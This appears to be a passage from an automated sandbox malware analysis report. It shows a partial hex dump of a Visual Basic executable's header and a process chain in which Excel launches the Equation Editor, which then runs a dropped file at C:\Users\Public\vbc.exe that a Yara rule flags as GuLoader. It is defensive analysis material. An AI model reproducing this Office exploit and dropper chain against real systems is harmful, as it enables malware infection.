        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 57 70 9a 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 50 00 00 00 00 00 00 00 15 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 42 00 00 00 04 00 00 00 00 00 00 00 00 c0 01 00 00 10 00 00 2d 1b 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 68 01 00 28 00 00 00 00 80 01 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 5d 01 00 00 10 00 00 00 60 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 34 0a 00 00 00 70 01 00 00 10 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 31 00 00 00 80 01 00 00 40 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$u1110~00Rich1PELWpJ`Pp@B-h(1( X.text]` `.data4pp@.rsrc1@@@IMSVBVM60.DLL


        Code Manipulations

        Statistics

        Behavior

        Click to jump to process

        System Behavior

        General

        Start time:20:45:23
        Start date:13/09/2021
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Imagebase:0x13f6f0000
        File size:28253536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate

        General

        Start time:20:45:45
        Start date:13/09/2021
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Imagebase:0x400000
        File size:543304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:20:45:47
        Start date:13/09/2021
        Path:C:\Users\Public\vbc.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\Public\vbc.exe'
        Imagebase:0x400000
        File size:114688 bytes
        MD5 hash:F378C63405C6FA0B24C2E4C142C42E9F
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:Visual Basic
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.688308642.00000000003F0000.00000040.00000001.sdmp, Author: Joe Security
        Antivirus matches:
        • Detection: 29%, ReversingLabs
        Reputation:low

        Disassembly

        Code Analysis

        Reset < >